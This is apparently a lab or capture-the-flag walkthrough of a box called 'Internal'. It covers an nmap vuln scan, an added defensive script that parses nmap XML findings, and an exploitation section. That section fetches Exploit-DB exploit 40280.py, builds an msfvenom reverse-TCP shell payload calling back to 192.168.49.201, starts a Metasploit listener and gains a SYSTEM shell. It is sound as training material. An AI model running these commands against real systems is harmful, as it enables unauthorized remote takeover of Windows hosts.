# Internal

## nmap

```
mkdir nmap
# RustScan finds the open ports fast, then hands them to nmap for -A (service/OS detection, default scripts)
# plus the vuln script category; -oA saves .nmap, .gnmap and .xml copies under nmap/
sudo rustscan -a 192.168.201.40 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan --script vuln
```

Looks like nmap detected a CVE on the target.

![](/files/-MkONxhge2HRXA1YZV1-)
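A defender's use of the same scan, as an added example that is not part of the original writeup: the `-oA` run above also writes `nmap/all-ports-service-scan.xml`, and this script pulls out every host/port where a vulns-library NSE script reported something other than NOT VULNERABLE or UNKNOWN, so findings can be triaged and patched. The embedded XML, script ids and CVE keys are constructed placeholders, not this box's real output.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape nmap writes with -oX/-oA when a vulns-library
# NSE script reports a result. Script ids and CVE keys are placeholders.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.201.40" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/><service name="microsoft-ds"/>
        <script id="smb-vuln-PLACEHOLDER" output="...">
          <table key="CVE-XXXX-YYYY">
            <elem key="title">Placeholder SMB remote code execution</elem>
            <elem key="state">VULNERABLE</elem>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/><service name="http"/>
        <script id="http-vuln-PLACEHOLDER" output="...">
          <table key="CVE-XXXX-ZZZZ">
            <elem key="state">NOT VULNERABLE</elem>
          </table>
        </script>
      </port>
    </ports>
  </host>
</nmaprun>
"""

def vulnerable_findings(xml_text):
    """Return one dict per finding whose state is not NOT VULNERABLE / UNKNOWN."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            for script in port.findall("script"):
                # each vulns-library result is a <table key="<vuln id>"> with a state elem
                for table in script.findall("table"):
                    state = table.findtext("elem[@key='state']")
                    if not state or state.startswith(("NOT VULNERABLE", "UNKNOWN")):
                        continue
                    findings.append({"host": addr, "port": int(port.get("portid")),
                                     "script": script.get("id"), "vuln": table.get("key"),
                                     "title": table.findtext("elem[@key='title']"),
                                     "state": state})
    return findings
```

Feed it the contents of `nmap/all-ports-service-scan.xml` instead of `SAMPLE_XML` to triage a real run; states such as `VULNERABLE (Exploitable)` and `LIKELY VULNERABLE` are kept for review.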

## Exploitation

Let's find the source code of the exploit for this CVE.

![](/files/-MkOOIrRjjFgxujRJGe-)

Mirror the exploit to your local machine with `searchsploit`:

```
searchsploit -m windows/remote/40280.py
```

Create the shellcode with `msfvenom` as per the exploit's instructions:

```
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.201 LPORT=4444 EXITFUNC=thread -f python -v shell
```

![](/files/-MkOPCrmREwkkGKjTq01)

Copy the generated shellcode and paste it over the shellcode in the exploit source code.

![](/files/-MkOPIb7U4hhKfzhOiqW)

Open `msfconsole` and execute the following to start the listener:

```
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost tun0
set exitfunc thread
run
```

![](/files/-MkOQ0uePXQNbjzykaWR)

Run the exploit against the target:

```
python 40280.py 192.168.201.40
```

And you should receive your `nt authority\system` shell.

![](/files/-MkOQRRZpO-lTiCnHwae)
